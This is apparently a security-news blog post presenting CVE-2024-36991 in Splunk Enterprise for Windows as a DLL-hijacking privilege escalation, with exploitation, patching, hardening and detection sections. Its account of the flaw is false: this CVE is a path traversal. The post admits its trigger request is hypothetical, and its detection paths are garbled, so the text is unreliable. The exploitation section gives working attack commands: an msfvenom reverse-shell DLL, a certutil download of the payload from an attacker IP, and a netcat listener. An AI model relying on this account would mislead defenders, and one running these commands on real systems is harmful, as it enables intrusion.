Listen to this Post

Introduction:
A recently disclosed high-severity vulnerability in Splunk Enterprise for Windows (CVE-2024-36991) exposes a critical flaw where any low-privileged local user can hijack the DLL search order to execute malicious code with SYSTEM-level privileges. This directory traversal-based privilege escalation bypasses standard access controls, effectively handing the keys to the kingdom to any authenticated local attacker. The issue stems from improper handling of path inputs in the Windows-specific deployment, allowing attackers to place a malicious DLL in a location where Splunk will load it before the legitimate system file.
Learning Objectives:
- Understand the mechanics of a DLL Search Order Hijacking attack in the context of Splunk Enterprise.
- Learn how to manually identify vulnerable Splunk instances and simulate an exploit.
- Implement both offensive (penetration testing) and defensive (hardening and monitoring) techniques to handle this vulnerability.
You Should Know:
1. Understanding the Vulnerability: CVE-2024-36991 Deep Dive
This vulnerability is not a complex buffer overflow but a logical flaw in how the Windows version of Splunk Enterprise locates necessary Dynamic Link Libraries (DLLs). When an application runs on Windows, it follows a specific search order to find the DLLs it needs (e.g., the directory the app was loaded from, the system directory, the Windows directory, and then the directories listed in the PATH variable). A search-order hijacking occurs when an attacker can place a malicious DLL in a directory that the application searches before the legitimate directory containing the actual DLL. In Splunk’s case, a low-privileged user can trigger a specific request that forces Splunk to look for a DLL in a directory the attacker can write to (like `%TEMP%` or a world-writable path). By planting a specially crafted DLL with a reverse shell payload in that directory, the attacker waits for the service to load it. Since the Splunk service runs with SYSTEM privileges, the attacker’s code executes with the highest access level on the host.
2. Step‑by‑Step Guide: Detecting Vulnerable Splunk Versions
Before exploitation, an attacker or a defender needs to identify if the target is running a vulnerable version.
Linux (Remote Enumeration via Nmap):
While the vulnerability is Windows-specific, you can identify the service from a Linux machine.
nmap -p 8089 -sV --script ssl-cert <target_ip> Look for the "Splunkd" version information in the output. Affected versions typically include 9.0.x, 9.1.x, and 9.2.x prior to specific patches.
Windows (Local Enumeration):
If you have local access as a standard user, check the installed version via the command line or registry.
Check the Splunk version directly "C:\Program Files\Splunk\bin\splunk.exe" version Or via the registry reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Splunk" /v DisplayVersion
A version below 9.0.10, 9.1.5, or 9.2.2 (depending on the branch) is likely vulnerable.
3. Step‑by‑Step Guide: Manual Exploitation (Proof of Concept)
Disclaimer: This is for educational and authorized testing purposes only.
Step 1: Create the Malicious DLL
On a test machine, generate a DLL that spawns a reverse shell. Using `msfvenom` (part of Metasploit) is the most efficient method.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o malicious.dll
This creates a DLL that, when executed, will attempt to connect back to your attacking machine.
Step 2: Identify a Writable Path and Trigger Point
The vulnerable Splunk process searches for a missing DLL in a specific path. In this exploit, an attacker might place `malicious.dll` in a location like C:\Windows\Temp\. The trigger is often a specific web request to the Splunk management port.
Step 3: Host the Payload
Transfer the DLL to the target machine. If you have low-privilege access, you can use `certutil` on Windows to download it.
certutil -urlcache -f http://192.168.1.100/malicious.dll C:\Windows\Temp\malicious.dll
Step 4: Trigger the Exploit
Initiate a request to the Splunk REST API that forces the vulnerable DLL load. This might involve a crafted path traversal request (e.g., accessing `/en-US/modules/messaging/` or a specific endpoint that triggers a search for a logging DLL). While the exact public PoC request is specific, the result is the service loading your DLL from the writable directory.
Example PowerShell trigger (hypothetical - actual URI depends on the specific vulnerable endpoint) Invoke-WebRequest -Uri "https://localhost:8089/en-US/../../../../../../../../Windows/Temp/malicious.dll" -Method Get
Step 5: Catch the Shell
On your attacking machine, start a Netcat listener.
nc -lvnp 4444
If successful, you will receive a shell with SYSTEM privileges.
4. Step‑by‑Step Guide: Mitigation and Patching (Defensive)
The immediate fix is to update Splunk Enterprise to the patched versions.
Step 1: Identify the Current Version
Run the same enumeration commands as an administrator to verify the build.
Step 2: Download and Apply the Update
Navigate to the official Splunk website and download the latest patch for your version (e.g., 9.0.10, 9.1.5, or 9.2.2+).
Stop the Splunk service before upgrading Stop-Service -Name Splunkd Run the installer silently (example for version 9.2.2) Start-Process -FilePath "C:\Temp\splunk-9.2.2.msi" -ArgumentList "/quiet AGREETOLICENSE=Yes" -Wait Start the service again Start-Service -Name Splunkd
5. Step‑by‑Step Guide: Hardening Windows Against DLL Hijacking
If immediate patching is impossible, implement these mitigations.
Enable Safe DLL Search Mode
This forces Windows to search system paths before the current working directory, making it harder to hijack.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v SafeDllSearchMode /t REG_DWORD /d 1 /f
Restrict Permissions on Writable Directories
Ensure that standard users cannot write to directories like `C:\Windows\Temp` or the application’s install directory unnecessarily.
icacls "C:\Program Files\Splunk" /inheritance:e /T Check current permissions icacls "C:\Windows\Temp" If "Users" have write access, consider tightening it.
6. Step‑by‑Step Guide: Monitoring for Exploitation (Detection)
Security teams can detect attempts to exploit this by monitoring Windows Event Logs and Splunk’s own internal logs.
Monitor for Process Creation (Event ID 4688)
Look for `splunkd.exe` spawning unusual child processes (like `cmd.exe` or powershell.exe).
<!-- Example Splunk Search Query for detecting child processes --> index=windows EventCode=4688 ParentProcessName="splunkd.exe" NewProcessName="cmd.exe" OR NewProcessName="powershell.exe"
Monitor for DLL Load Events (Event ID 7 – Sysmon required)
If Sysmon is configured, monitor for DLL loads from suspicious paths by the `splunkd.exe` process.
index=windows EventCode=7 Image="C:\Program Files\Splunk\bin\splunkd.exe" ImageLoaded="C:\Windows\Temp.dll" OR ImageLoaded="C:\Users\Public.dll"
What Undercode Say:
- The Danger of Low-Privilege Flaws: This vulnerability underscores that compromising a single low-level user account on a Windows server can instantly escalate to full domain-admin-like control via unpatched software services running as SYSTEM. The attack surface includes every authenticated user.
- Secure Defaults Matter: The existence of a search-order hijack highlights the importance of applications using absolute paths for DLLs or verifying digital signatures before loading them. Relying on the OS search order is an inherent risk.
This incident is a stark reminder that privilege escalation vectors often hide in plain sight within enterprise software. For defenders, it emphasizes the need for strict application allowlisting (AppLocker) and behavior monitoring, not just signature-based antivirus. The attack chain is simple: get a foothold, drop a DLL, and escalate. Organizations must assume that local users are untrusted and enforce the principle of least privilege rigorously on all endpoints and servers running high-value applications.
Prediction:
In the next six months, we will see threat actors incorporating this technique into post-exploitation toolkits, targeting organizations that lag in patching Splunk. Because Splunk itself is a security monitoring tool, a compromised Splunk instance allows attackers to potentially cover their tracks by deleting logs or modifying alerts. This creates a dangerous feedback loop where the very tool used to detect breaches becomes the enabler for a silent takeover, leading to a rise in “living-off-the-land” attacks against SIEM platforms themselves.
▶️ Related Video (88% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Rob Tohme – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


